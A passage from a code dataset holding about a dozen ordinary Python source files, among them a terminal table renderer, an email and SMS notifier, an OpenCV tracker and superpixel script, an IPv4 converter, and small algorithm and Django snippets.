term_height\n\n\nclass TableHeader(object):\n ALIGN_LEFT = '<'\n ALIGN_RIGHT = '>'\n\n def __init__(self, name, color=None, align_column=ALIGN_LEFT, alignment_text=ALIGN_LEFT):\n \"\"\"\n Creates a new TableHeader object.\n\n :param str name:\n :param str color: color to use for this column\n :param str align_column:\n :param str alignment_text:\n \"\"\"\n self._name = name\n self._color = color\n self._align_column = align_column\n self._alignment_text = alignment_text\n\n @property\n def name(self):\n return self._name\n\n @property\n def color(self):\n return self._color\n\n @property\n def column_alignment(self):\n return self._align_column\n\n @property\n def text_alignment(self):\n return self._alignment_text\n\n\nclass Table(object):\n def __init__(self, colors=True, utf8=False, pastable=False):\n self.r_just = False\n self.got_column = False\n self.got_row = False\n self.groups = []\n self.header = []\n self.table = []\n self.coloroverride = []\n self._header_colors = False\n self.view = None\n self.showseps = False\n self.maxwidth = 0 # if 0, determine terminal width automatically\n if pastable:\n self.colors = False\n self.utf8 = False\n self.maxwidth = 78\n else:\n self.colors = colors\n self.utf8 = utf8\n\n def add_column(self, name, color=None, align_column=TableHeader.ALIGN_LEFT, just_txt=TableHeader.ALIGN_LEFT):\n self.got_column = True\n if self.got_row:\n raise SyntaxException(\"Not allowed to define columns after rows\")\n if align_column == TableHeader.ALIGN_RIGHT:\n if self.r_just:\n raise SyntaxException(\"Can not right align column more than once\")\n else:\n self.r_just = True\n\n if not self.colors:\n color = None\n\n self.header.append({\n 'name': name,\n 'color': color,\n 'align_column': align_column,\n 'just_txt': just_txt})\n\n def header_name(self, index):\n return self.header[index]['name']\n\n def add_header(self, header):\n \"\"\"\n Adds a table header\n :param TableHeader header:\n :return:\n \"\"\"\n return self.add_column(header.name, header.color, header.column_alignment, header.text_alignment)\n\n def add_headers(self, headers):\n \"\"\"\n Adds a list of table headers.\n :param list[TableHeader] headers: list of table headers\n :return:\n \"\"\"\n for hdr in headers:\n self.add_header(hdr)\n\n @classmethod\n def to_unicode(cls, t):\n if isinstance(t, str):\n if PYTHON2:\n return unicode(t, 'UTF-8')\n else:\n return t\n elif isinstance(t, unicode):\n return t\n else:\n if PYTHON2:\n return unicode(t)\n else:\n return str(t)\n\n def add_row(self, row):\n self.got_row = True\n if not self.got_column:\n raise SyntaxException(\"Not allowed to define rows before columns\")\n if len(row) != len(self.header):\n raise SyntaxException(\"Row len does not match headers\")\n\n coloroverride = [None] * len(row)\n for idx, c in enumerate(row[:]):\n if isinstance(c, tuple):\n color, text = c\n row[idx] = self.to_unicode(text)\n if self.colors:\n coloroverride[idx] = color\n else:\n row[idx] = self.to_unicode(row[idx])\n\n self.table.append(row)\n self.coloroverride.append(coloroverride)\n\n def add_separator(self):\n self.table.append([None])\n\n def set_show_separators(self, val=False):\n self.showseps = val\n\n def set_view(self, columns):\n self.view = columns\n\n def set_groupby(self, groups):\n if groups:\n assert (isinstance(groups, list))\n self.groups = groups\n\n @classmethod\n def _determine_column_width(cls, column_text):\n \"\"\"\n Returns the longest line in the column_text.\n\n :param str column_text: column text\n :return: Lenght of the longest line in the text\n :rtype: int\n \"\"\"\n maxline = 0\n for line in str(column_text).splitlines():\n maxline = max(len(line), maxline)\n return maxline\n\n @classmethod\n def _str_print(cls, output):\n \"\"\"\n Print and return output with attached new line.\n\n :param str output:\n :return: output + '\\n'\n :rtype: str\n \"\"\"\n print(output)\n return output + '\\n'\n\n @classmethod\n def _row_expand(cls, row):\n \"\"\"\n Expands a row with columns e.g.:\n [\"column1_line1\\ncolumn1_line2\", \"column2_line1\", \"column3_line1\\ncolumn3_line2\\ncolumn3_line3\"]\n\n to the following format:\n [\n [\"column1_line1\", \"column2_line1\", \"column3_line1\"],\n [\"column1_line2\", \"\", \"column3_line2\"],\n [\"\", \"\", \"column3_line3\"]\n ]\n :param list[str] row:\n :return:\n :rtype: list[list[str]]\n \"\"\"\n max_rows = 1\n\n # pre calculate table dimensions\n for column in row:\n max_rows = max(str(column).count('\\n') + 1, max_rows)\n\n if max_rows == 1: # small optimization\n return [row]\n\n multirow = [[\"\"] * len(row) for x in range(max_rows)] # create a pre filled table\n\n for cidx, column in enumerate(row):\n lines = str(column).splitlines()\n for idx, line in enumerate(lines):\n multirow[idx][cidx] = line\n\n return multirow\n\n def show(self, row_separator=True):\n output_table_str = ''\n # no view set, use all headers\n if not self.view:\n self.view = [h['name'] for h in self.header]\n\n if self.groups:\n self.view += [g for g in self.groups if g not in self.view]\n\n pcnt = 0\n for idx, c in enumerate(self.header[:]):\n if c['name'] not in self.view:\n pidx = idx - pcnt\n pcnt += 1\n self.header.pop(pidx)\n for row in self.table:\n row.pop(pidx)\n for row in self.coloroverride:\n row.pop(pidx)\n\n columnmax = [0] * len(self.header)\n if self.maxwidth:\n maxwidth = self.maxwidth\n else:\n term_width, _ = get_terminal_size()\n maxwidth = 110 if term_width > 110 else term_width\n\n hdrnames = [h['name'] for h in self.header]\n if self.groups and self.table:\n low_hdrnames = [h.lower() for h in hdrnames]\n group_bys = [low_hdrnames.index(g.lower()) for g in self.groups if g.lower() in low_hdrnames]\n for row in self.table:\n for idx in group_bys:\n try:\n row[idx] = int(row[idx])\n except ValueError:\n pass\n for idx, row in enumerate(self.table):\n row += [idx] # add table index for remap coloroverrides later\n orig_coloroverride = self.coloroverride[:]\n try:\n from natsort import natsorted\n self.table = natsorted(self.table, key=operator.itemgetter(*group_bys))\n except ImportError:\n self.table.sort(key=operator.itemgetter(*group_bys))\n\n # restore color overrides after sort\n for idx, row in enumerate(self.table):\n self.coloroverride[idx] = orig_coloroverride[row[-1]]\n # maybe remove the additional table index column, but it doesn't do harm\n\n lstlen = len(self.table)\n seps = set()\n for c in range(len(self.header)):\n if c not in group_bys:\n continue\n cur = self.table[0][c]\n for idx, l in enumerate(self.table):\n if idx < lstlen - 1:\n if self.table[idx + 1][c] != cur:\n cur = self.table[idx + 1][c]\n seps.add(idx + 1)\n\n if self.showseps:\n for c, pos in enumerate(sorted(seps)):\n self.table.insert(c + pos, [None])\n\n # calc max width per column and set final strings (with color codes)\n self.table.insert(0, [h.replace('_', ' ') for h in hdrnames])\n self.coloroverride.insert(0, [None] * len(self.header))\n\n # precalculate maximum column width\n multi_line_row = False\n for ridx, row in enumerate(self.table):\n if row[0] is None:\n continue\n for idx, col in enumerate(self.header):\n if not multi_line_row:\n multi_line_row = str(row[idx]).find(\"\\n\") >= 0\n columnmax[idx] = max(self._determine_column_width(row[idx]), columnmax[idx])\n\n # insert frames\n self.table.insert(0, [None])\n self.table.insert(2, [None])\n self.table.append([None])\n\n # build format string\n ctbl = {\n 'utf8': {\n 'tl': u'╭', # top left\n 'tr': u'╮', # top right\n 'bl': u'╰', # bottom left\n 'br': u'╯', # bottom right\n 'mr': u'╡', # middle right\n 'ml': u'╞', # middle left\n 'mdc': u'┄', # middle dotted connector\n 'msc': u'─', # middle straight connector\n 'pipe': u'┊',\n 'hr': u'═'\n },\n 'ascii': {\n 'tl': u'+',\n 'tr': u'+',\n 'bl': u'+',\n 'br': u'+',\n 'mr': u'|',\n 'ml': u'|',\n 'mdc': u'-',\n 'msc': u'-',\n 'pipe': u'|',\n 'hr': u'='\n }\n }\n\n enc = 'ascii'\n if self.utf8:\n locales = locale.getdefaultlocale()\n if len(locales) > 1 and locales[1] and isinstance(locales[1], str) and locales[1].lower() == 'utf-8':\n enc = 'utf8'\n\n try:\n data_idx = 0 # index of the actual data table, self.table was inserted with table separators\n space = maxwidth - sum(columnmax)\n header_size = len(self.header)\n table_size = len(self.table)\n for ridx, row in enumerate(self.table):\n if row[0] is None: # print a separator\n if ridx == 0: # top line\n l, m, r = ctbl[enc]['tl'], ctbl[enc]['msc'], ctbl[enc]['tr']\n elif ridx == table_size - 1: # bottom line\n l, m, r = ctbl[enc]['bl'], ctbl[enc]['msc'], ctbl[enc]['br']\n elif ridx == 2:\n l, m, r = ctbl[enc]['ml'], ctbl[enc]['hr'], ctbl[enc]['mr']\n else: # mid separators\n l, m, r = ctbl[enc]['ml'], ctbl[enc]['mdc'], ctbl[enc]['mr']\n row_sep = l + m * (sum(columnmax) + (3 * header_size) - 1) + r\n\n if self.r_just and len(row_sep) < maxwidth:\n output_table_str += self._str_print(l + m * (maxwidth - 2) + r)\n else:\n output_table_str += self._str_print(row_sep)\n else:\n fstr = ctbl[enc]['pipe'] # prepare the format string per row, this allows colors per cell\n for idx, col in enumerate(self.header): # loop columns\n if col['align_column'] == TableHeader.ALIGN_RIGHT:\n space_and_overhead = space - (header_size * 3) - 2\n if space_and_overhead >= 0:\n fstr += u' ' * space_and_overhead + ctbl[enc]['pipe']\n\n field_format = u'{' + str(idx) + u':' + col['just_txt'] + str(columnmax[idx]) + u'}'\n\n fstr += u' '\n # add color, if set\n if self.coloroverride[data_idx][idx] or col['color'] and (self._header_colors or data_idx > 0):\n if self.coloroverride[data_idx][idx]:\n color = self.coloroverride[data_idx][idx]\n else:\n color = col['color']\n fstr += color + field_format + Color.NONE\n else:\n fstr += field_format\n fstr += u' ' + ctbl[enc]['pipe']\n\n data_idx += 1 # we wrote a data row, so increase the data_idx\n # split rows into row lines (for multiline support)\n for singlerow in self._row_expand(row):\n output_table_str += self._str_print(fstr.format(*singlerow))\n\n # if multiline rows and not disabled draw row separators between real rows\n if 2 < ridx < table_size - 2:\n if multi_line_row and row_separator:\n row_sep = ctbl[enc]['ml'] + ctbl[enc]['mdc']\\\n * (sum(columnmax) + (3 * header_size) - 1) + ctbl[enc]['mr']\n output_table_str += self._str_print(row_sep)\n return output_table_str\n except IOError as e:\n if e.errno == errno.EPIPE:\n return\n else:\n raise e\n\n def color_cell(self, text, color):\n return (color, text) if self.colors else text\n","repo_name":"LINBIT/linstor-client","sub_path":"linstor_client/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":15172,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"78"} +{"seq_id":"41010891939","text":"import asyncio\nimport datetime\nimport random\nimport websockets\nimport cv2\nimport numpy as np\n\nkernel = np.ones((5,5),np.uint8)\n\n# Take input from webcam\ncap = cv2.VideoCapture(0)\nprint(str(cap.get(3))+' x '+str(cap.get(4)))\n\nhmn = 11\nhmx = 135\n\nsmn = 18\nsmx = 66\n\nvmn = 56\nvmx = 110\n\nasync def time(websocket, path):\n print('connected')\n while True:\n is_sucessfully_read, frame = cap.read()\n \n cv2.flip(frame,1)\n \n hsv = cv2.cvtColor(frame,cv2.COLOR_BGR2HSV)\n hue,sat,val = cv2.split(hsv)\n \n # Apply thresholding\n hthresh = cv2.inRange(np.array(hue),np.array(hmn),np.array(hmx))\n sthresh = cv2.inRange(np.array(sat),np.array(smn),np.array(smx))\n vthresh = cv2.inRange(np.array(val),np.array(vmn),np.array(vmx))\n\n # AND h s and v\n tracking = cv2.bitwise_and(hthresh,cv2.bitwise_and(sthresh,vthresh))\n\n # Some morpholigical filtering\n dilation = cv2.dilate(tracking,kernel,iterations = 1)\n closing = cv2.morphologyEx(dilation, cv2.MORPH_CLOSE, kernel)\n closing = cv2.GaussianBlur(closing,(5,5),0)\n\n # Detect circles using HoughCircles 100/50\n circles = cv2.HoughCircles(closing,cv2.HOUGH_GRADIENT,2,120,param1=70,param2=40,minRadius=5,maxRadius=10)\n\n x = 0\n y = 0\n \n #Draw Circles\n if circles is not None:\n for i in circles[0,:]:\n x = int(round(i[0]))\n y = int(round(i[1]))\n cv2.circle(frame,(int(round(i[0])),int(round(i[1]))),int(round(i[2])),(0,255,0),1)\n cv2.circle(frame,(int(round(i[0])),int(round(i[1]))),2,(0,255,0),5)\n \n if(x>0 and y>0):\n #print('x: '+str(x))\n #print('y: '+str(y))\n await websocket.send(str(x)+';'+str(y))\n \n #await asyncio.sleep(0.1)\n\t\t\t\t\nstart_server = websockets.serve(time, '10.0.1.44', 5678)\nprint('websocket started...')\n\nasyncio.get_event_loop().run_until_complete(start_server)\nasyncio.get_event_loop().run_forever()\n\n","repo_name":"otakuu/pingPongTracker","sub_path":"websocket.py","file_name":"websocket.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1678411337","text":"import smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.base import MIMEBase\nfrom email.mime.text import MIMEText\nfrom email.utils import COMMASPACE\nfrom email import encoders\nimport datetime\nfrom typing import List\nfrom twilio.rest import Client\n\n\ndef send_text(account_sid: str, auth_token: str, from_number: str, to_number: str, text_body: str) -> None:\n \"\"\"account_sid : account id of twilio account. see the READ.MD on how you can get it \nauth_token : authorization token for twilio services see the READ.MD on how you can get it \nfrom_number : the number you will use to send the text. This should be provided by Twilio. Read the READ.MD for how you should get it \nto_number : list of the numbers that will get the text \nex) '+142444444444'\ntext_body : content of the text \"\"\"\n # Set up the credentials \n account_sid = account_sid\n auth_token = auth_token\n client = Client(account_sid, auth_token)\n\n # Send the message \n message = client.messages.create(\n from_=from_number,\n body=text_body,\n to=to_number\n )\n\n print(f\"message sent. message sid : {message.sid}\")\n\n\ndef send_email(sender_email: str, sender_password: str, to_email: str, smtp_server: str = None, smtp_port: str = None, file_loc: str = None, mail_body: str = 'this is message generated from send_alert module', mail_subject: str = f\"{datetime.datetime.now()} alert sent by send_alert module\") -> bool:\n \"\"\"\n sender_email : email you will use to send the alert\\n\n sender_password : password for the email you will use to send the alert\\n\n to_email : list of emails that will get the alert\\n\n ex) 'test2@gmail.com'\\n\n smtp_server : smtp server for your sender email. If we have the smtp server of your email provider in our db, you might not need to input it \n ex) gmail.com -> smtp.gmail.com\n smtp_port : smtp server for your sender email. If we have the smtp port of your email provider in our db, you might not need to input it \n ex) gmail.com -> 587 \n file_loc : full directory of the attachement file (default : None)\\n\n mail_body : the content of the mail\\n\n mail_subject : the subject of the mail \\n\n \"\"\"\n\n # list of email providers\n email_provider_dict = {\n \"gmail\": {\n \"smtp_server\": \"smtp.gmail.com\",\n \"smtp_port\": 587\n },\n \"yahoo\": {\n \"smtp_server\": \"smtp.mail.yahoo.com\",\n \"smtp_port\": 465\n },\n \"outlook\": {\n \"smtp_server\": \"smtp.office365.com\",\n \"smtp_port\": 587\n },\n \"aol\": {\n \"smtp_server\": \"smtp.aol.com\",\n \"smtp_port\": 587\n },\n \"protonmail\": {\n \"smtp_server\": \"smtp.protonmail.com\",\n \"smtp_port\": 587\n },\n \"naver\": {\n \"smtp_server\": \"smtp.naver.com\",\n \"smtp_port\": 587\n },\n \"zoho\": {\n \"smtp_server\": \"smtp.zoho.com\",\n \"port\": 587\n }\n }\n # Email credentials\n sender_email = sender_email\n # If smtp_server or smtp_port is not provided\n if smtp_server is None or smtp_port is None:\n email_provider = sender_email.split('@')[1].split('.')[0].lower()\n try:\n smtp_server = email_provider_dict[email_provider][\"smtp_server\"]\n smtp_port = email_provider_dict[email_provider][\"smtp_port\"]\n except Exception as e:\n print(\"smtp_server and smtp_port was not found in our database. Please provide the server (eg. smtp.gmail.com) and the port (eg. 465)\")\n print(e)\n sender_password = sender_password\n\n # Recipient email\n to = to_email\n\n # Create a multipart message\n msg = MIMEMultipart()\n msg['From'] = sender_email\n msg['To'] = COMMASPACE.join([to])\n msg['Subject'] = mail_subject\n\n # Add message body\n body = mail_body\n msg.attach(MIMEText(body))\n\n if file_loc:\n # Add attachment\n filename = file_loc\n attachment = open(filename, 'rb')\n part = MIMEBase('application', 'octet-stream')\n part.set_payload((attachment).read())\n encoders.encode_base64(part)\n part.add_header('Content-Disposition',\n \"attachment; filename= %s\" % filename)\n msg.attach(part)\n\n # Send the email\n try:\n smtpObj = smtplib.SMTP(smtp_server, smtp_port)\n smtpObj.starttls()\n smtpObj.login(sender_email, sender_password)\n smtpObj.sendmail(sender_email, to, msg.as_string())\n smtpObj.quit()\n print(f\"Email to {to} sent successfully\")\n return True\n except Exception as e:\n print(\"Error: unable to send email\", e)\n return False\n","repo_name":"dougieduk/dougs_noti","sub_path":"dougs_noti/noti.py","file_name":"noti.py","file_ext":"py","file_size_in_byte":4703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10737984400","text":"\"\"\"\nhttps://www.geeksforgeeks.org/count-of-subsets-with-given-difference/\n\nGiven an array arr[] of size N and a given difference diff, the task is to count the number of partitions that we can\n perform such that the difference between the sum of the two subsets is equal to the given difference.\n\nNote: A partition in the array means dividing an array into two parts say S1 and S2 such that the union of S1 and S2\nis equal to the original array and each element is present in only of the subsets.\n\"\"\"\n\nfrom typing import List, Dict, Tuple\n\n\"\"\" My solution \"\"\"\n\n\ndef get_number_subsets(nums: List[int], diff: int) -> int:\n \"\"\"\n :param nums: elements available to be partitioned\n :param diff: desired difference between two partitions\n :return: ways to partition nums in two parts so that the difference between them is \"diff\"\n\n Idea: let K(n, diff) the way to subset the first (n + 1) items so that S_1 - S_2 = diff\n Recursion: K(n + 1, diff) = K(n, diff + a[n + 1]) + K(n, diff - a[n + 1])\n Initialize: K(-1, 0) = 1, for any i != 0, K(-1, i) = 0\n In the first case, add a[n + 1] to S_2 and get diff. In the second case, add a[n + 1] so S_1 and get diff.\n \"\"\"\n n = len(nums)\n # memorization[(i, j)] is K(i, j), i.e. ways to solve problem with (i + 1) first objects and j desired diff\n memoization = dict()\n return _number_subsets(n=n - 1, diff=diff, memoization=memoization, nums=nums)\n\n\ndef _number_subsets(n: int, diff: int, memoization: Dict[Tuple[int, int], int], nums: List[int]) -> int:\n \"\"\"\n Define recursion\n :param n: number of items at disposal minus 1 (index of last item available)\n :param diff: target difference\n :return: number of items\n \"\"\"\n if (n, diff) in memoization:\n return memoization[n, diff]\n # no item at all. Note: important to initialize with empty set rather than 1st item -- will be different if\n # there is a zero\n if n == -1:\n if diff == 0:\n return 1 # with no item at all, we can only make an empty set, which sums to zero\n else:\n return 0\n else:\n res = _number_subsets(n=n - 1, diff=diff + nums[n], memoization=memoization, nums=nums) \\\n + _number_subsets(n=n - 1, diff=diff - nums[n], memoization=memoization, nums=nums)\n memoization[n, diff] = res\n return res\n\n\ndef main():\n nums = [0, 1]\n assert get_number_subsets(nums=nums, diff=1) == 2\n nums = [1, 2, 3, 1, 2]\n assert get_number_subsets(nums=nums, diff=1) == 5\n nums = [5, 2, 6, 4]\n assert get_number_subsets(nums=nums, diff=3) == 1\n nums = [0, 0, 0, 0, 0, 0, 0, 0, 1]\n assert get_number_subsets(nums=nums, diff=1) == 256\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"GabCaz/quant-algorithms","sub_path":"dynamic-programming/count_of_subsets_with_given_difference.py","file_name":"count_of_subsets_with_given_difference.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27949879454","text":"import time\n\n# Set the number of seconds to count down from\nseconds = 10\n\n# Loop through the countdown and print each second\nfor i in range(seconds, 0, -1):\n print(i)\n time.sleep(1)\n\n# Print \"Time's up!\" when the countdown is done\nprint(\"Time's up!\")\n\n\n","repo_name":"GchatCodes/Timer","sub_path":"таймер/таймер.py","file_name":"таймер.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71186206013","text":"import cv2 as cv\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nstr_to_algorithm = {\n 'SLIC': cv.ximgproc.SLIC,\n 'SLICO': cv.ximgproc.SLICO,\n 'MSLIC': cv.ximgproc.MSLIC\n}\n\nclass SuperpixelsEx():\n\n def __init__(self, algorithm='SLIC'):\n \n self.algorithm = str_to_algorithm[algorithm]\n\n def __str__(self):\n return 'superpixels'\n\n def describeImage(self,img):\n\n img = cv.GaussianBlur(img, (3, 3), 0)\n # instance and run SLIC\n slic = cv.ximgproc.createSuperpixelSLIC(img, self.algorithm, 100)\n slic.iterate(10)\n\n # get and draw superpixels\n mask = slic.getLabelContourMask()\n \n img_superpixeled = img.copy()\n img_superpixeled[mask != 0] = (0, 255, 255)\n\n # replace original image pixels with superpixels means\n labels = slic.getLabels()\n\n img_clustered = np.zeros_like(img)\n\n num_superpixels = slic.getNumberOfSuperpixels()\n print(num_superpixels)\n for k in range(num_superpixels):\n class_mask = (labels == k).astype(\"uint8\")\n mean_color = cv.mean(img, class_mask)\n img_clustered[class_mask != 0, :] = mean_color[:3]\n\n return img_clustered, img_superpixeled, labels, num_superpixels\n\n\n def extract_features(self, img):\n pass\n\nif __name__ == '__main__':\n image = cv.imread('.\\examples\\SOB_B_A-14-22549AB-40-019.png', cv.IMREAD_COLOR)\n image = cv.cvtColor(image, cv.COLOR_BGR2Lab)\n my_superpixels = SuperpixelsEx()\n img_clustered, img_superpixeled, labels, num_superpixels = my_superpixels.describeImage(image)\n print(np.unique(labels), num_superpixels) \n plt.imshow(labels)\n plt.show()\n cv.imwrite(\"C:/Users/hadil/Documents/projects/Machine Learning/project/breast/benign/SOB/adenosis/SOB_B_A_14-22549AB/40X/SOB_B_A-14-22549AB-40-001.png\", labels)\n all_features = []\n for k in range(num_superpixels):\n class_mask = (labels == k).astype(\"uint8\")\n ma_sk = (labels == k).astype(np.uint8)\n img_clustered = cv.bitwise_and(img_superpixeled, img_superpixeled, mask=ma_sk)\n features = my_superpixels.extract_features(img_clustered)\n all_features.append(features)\n\n\n all_features = np.array(all_features)\n print(all_features.shape)\n\n #Just for testing:\n #np.savetxt('all_features.csv', all_features, delimiter=',')","repo_name":"yusuftengriverdi/breakhis-classification","sub_path":"features/extractors/superpixels.py","file_name":"superpixels.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"9134171360","text":"from collections import deque\n\npeople = deque()\n\nn, k = map(int, input().split())\n\nfor i in range(1, n+1):\n people.append(i)\n\nanswer = []\n\nwhile people:\n for i in range(k-1):\n people.append(people.popleft())\n answer.append(people.popleft())\n\nprint(str(answer).replace('[', '<').replace(']', '>'))","repo_name":"LEEJaeHyeok97/PYTHON_algorithm","sub_path":"알고리즘기초1/요세푸스.py","file_name":"요세푸스.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5101312731","text":"import re\n\ndef biToDe(biStr):\n ans=0\n for bit in biStr:\n ans=ans*2+int(bit)\n return ans\n\ndef deToBi(deStr):\n ans = \"\"\n currValue = 128\n deInt = int(deStr)\n for i in range(0,8):\n if(deInt>=currValue):\n ans+=\"1\"\n deInt-=currValue\n else:\n ans+=\"0\"\n currValue /= 2\n return ans\n\n\ndef biAddressToDeAddess(biAddress):\n ans = \"\"\n biAddressParts = re.findall(\"[0-9]+\", biAddress)\n for biAddressPart in biAddressParts:\n ans+=str(biToDe(biAddressPart))+\".\"\n ans = ans[0:-1]\n return ans\n\ndef deAddressToBiAddess(biAddress):\n ans = \"\"\n deAddressParts = re.findall(\"[0-9]+\", biAddress)\n for deAddressPart in deAddressParts:\n ans+=str(deToBi(deAddressPart))+\".\"\n ans = ans[0:-1]\n return ans\n\ndef announce(biAddress, text):\n print(\"*********\")\n print(text, biAddress)\n print(text, biAddressToDeAddess(biAddress))\n print(\"*********\")\n print()\n\ndef networkAddress(biAddress, networkPart):\n currBit = 0\n ans = \"\"\n for bit in biAddress:\n if(bit!=\".\"):\n currBit+=1\n if(currBit>networkPart):\n ans+=\"0\"\n else:\n ans+=bit\n else:\n ans+=bit\n announce(ans, \"Network Address\")\n\ndef broadcastAddress(biAddress, networkPart):\n currBit = 0\n ans = \"\"\n for bit in biAddress:\n if(bit!=\".\"):\n currBit+=1\n if(currBit>networkPart):\n ans+=\"1\"\n else:\n ans+=bit\n else:\n ans+=bit\n announce(ans, \"Broadcast Address\")\n\ndef subnetMaskAddress(biAddress, networkPart):\n currBit = 0\n ans = \"\"\n for bit in biAddress:\n if(bit!=\".\"):\n currBit+=1\n if(currBit<=networkPart):\n ans+=\"1\"\n else:\n ans+=\"0\"\n else:\n ans+=bit\n announce(ans, \"Subnet mask Address\")\n\ndef __main__():\n IPv4 = input(\"Input IPv4 Address (In any format is okay):\");\n #IPv4 = \"128.226.170.3\"\n networkPart = -1;\n #Calculate Network Part\n if(\"/\" in IPv4):\n ipAddress = re.findall(\"(.*)/\", IPv4)[0]\n networkPart = int(re.findall(\"/(.*)\", IPv4)[0])\n else:\n ipAddress = IPv4\n #Convert Ip Address to both Bi and De\n if(len(ipAddress)>32):\n ipAddressBi = ipAddress\n else:\n ipAddressBi = deAddressToBiAddess(ipAddress)\n announce(ipAddressBi, \"IPv4 Address\")\n if(networkPart>=0):\n networkAddress(ipAddressBi, networkPart)\n broadcastAddress(ipAddressBi, networkPart)\n subnetMaskAddress(ipAddressBi, networkPart)\n \n\n__main__()","repo_name":"danganhvu1998/myINIAD","sub_path":"code/PythonINIAD/IPv4Converter.py","file_name":"IPv4Converter.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"71720029692","text":"from django.shortcuts import render\n#main function\nfrom . import helpers\n\n\ndef index(request):\n collection = helpers.connect()\n var = request.GET.get('search')\n data = str(var)\n result = helpers.CheckPalindrome(data)\n\n if var:\n if helpers.isNum(var) == True:\n product_list = list(collection.find({\"id\": int(var)}).limit(1))\n if result == True:\n helpers.discount_promotion(product_list)\n context = {\n 'product_list': product_list, 'palindrome': result\n }\n return render(request, 'walmart/index.html', context)\n\n else:\n data = data.lower()\n regex_query = [{\"brand\": {\"$regex\": data}},{\"description\": {\"$regex\": data}}]\n product_list = list(collection.find({'$or': regex_query}))\n\n if result == True and len(data) > 3:\n helpers.discount_promotion(product_list)\n context = {\n 'product_list': product_list, 'palindrome': result\n }\n return render(request, 'walmart/index.html', context)\n\n\n\n context = {\n 'product_list':'', 'palindrome': ''\n }\n return render(request, 'walmart/index.html', context)\n","repo_name":"xperro/desafio_walmart","sub_path":"desafio/walmart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27681492841","text":"from django.apps import apps as django_apps\nfrom edc_model_wrapper import ModelWrapper\nfrom edc_lab.models import BoxItem, ManifestItem\n\nfrom ..dashboard_urls import dashboard_urls\n\nedc_lab_app_config = django_apps.get_app_config('edc_lab')\n\n\nclass AliquotModelWrapper(ModelWrapper):\n\n model = edc_lab_app_config.aliquot_model\n next_url_name = dashboard_urls.get('aliquot_listboard_url')\n\n @property\n def human_readable_identifier(self):\n return self.object.human_readable_identifier\n\n @property\n def box_item(self):\n try:\n return BoxItem.objects.get(identifier=self.aliquot_identifier)\n except BoxItem.DoesNotExist:\n return None\n\n @property\n def manifest_item(self):\n manifest_item = None\n if self.box_item:\n try:\n manifest_item = ManifestItem.objects.get(\n identifier=self.box_item.box.box_identifier)\n except ManifestItem.DoesNotExist:\n pass\n return manifest_item\n","repo_name":"botswana-harvard/edc-lab-dashboard","sub_path":"edc_lab_dashboard/model_wrappers/aliquot_model_wrapper.py","file_name":"aliquot_model_wrapper.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17238404305","text":"from grammar import SimpleGrammar\n\nsg = SimpleGrammar()\nsg.add_tag(\"story\", [\"#story_beginning# #story_problem# #story_climax# #story_ending#\"])\nsg.add_tag(\"story_beginning\", [\"Once upon a time there was a valiant #animal#\"])\nsg.add_tag(\"story_problem\", [\"that never #difficulty_verb#.\", \\\n \"that one day heard some strange words: #strange_calling#\"])\nsg.add_tag(\"story_climax\", [\"Suddenly, he decided to #resolution_verb#.\"])\nsg.add_tag(\"story_ending\", [\"Finally he could #result_verb# without worries.\"])\nsg.add_tag(\"difficulty_verb\", [\"slept\", \"danced\", \"talked\"])\nsg.add_tag(\"resolution_verb\", [\"run\", \"sing\", \"give up\"])\nsg.add_tag(\"result_verb\", [\"sleep\", \"dance\", \"talk freely\"])\nsg.add_tag(\"strange_calling\", [\"Hello #name#!\", \"Hello my #writer_object#!\"])\nsg.add_tag(\"animal\", [\"dolphin\", \"dog\", \"cat\", \"lamb\", \"lion\"])\nsg.add_tag(\"name\", [\"Mr. Gil\", \"Madame\", \"Masked Man\"])\nsg.add_tag(\"writer_object\", [\"text\", \"book\", \"beloved code\"])\n\nprint(sg.evaluate(\"#story#\"))","repo_name":"adrianogil/nanogenmo17","sub_path":"src/grammar_test.py","file_name":"grammar_test.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22387257985","text":"import boto3\nimport json\nimport os\nimport logging\nimport requests\nimport getpass\nfrom botocore.exceptions import SSOTokenLoadError\nfrom botocore.exceptions import UnauthorizedSSOTokenError\nfrom configparser import ConfigParser\n\n\ndef awscliv2_exists():\n \"Return True if AWSCLIv2 is installed\"\n return os.path.exists(\n os.path.dirname(\"C:/Program Files/Amazon/AWSCLIV2\")\n )\n\n\ndef check_path(file_path):\n if not os.path.exists(os.path.dirname(file_path)):\n try:\n os.makedirs(os.path.dirname(file_path))\n return file_path\n except OSError as exc:\n if exc.errno != errno.EEXIST:\n raise\n\n\ndef write_file(file_path, file_contents):\n with open(file_path, \"w\") as file_output:\n file_output.write(file_contents)\n\n\ndef append_profiles(filepath, account_id, account_name, filetype=\"config\"):\n \"Append/Overwrite ct_audit and legacy_audit profiles to aws config file\"\n delimiter()\n print(\"Adding profile to your aws config file\")\n config = ConfigParser()\n config.read(filepath)\n if filetype.lower() == \"config\":\n profile = \"profile \"\n if filetype.lower() == \"credentials\":\n 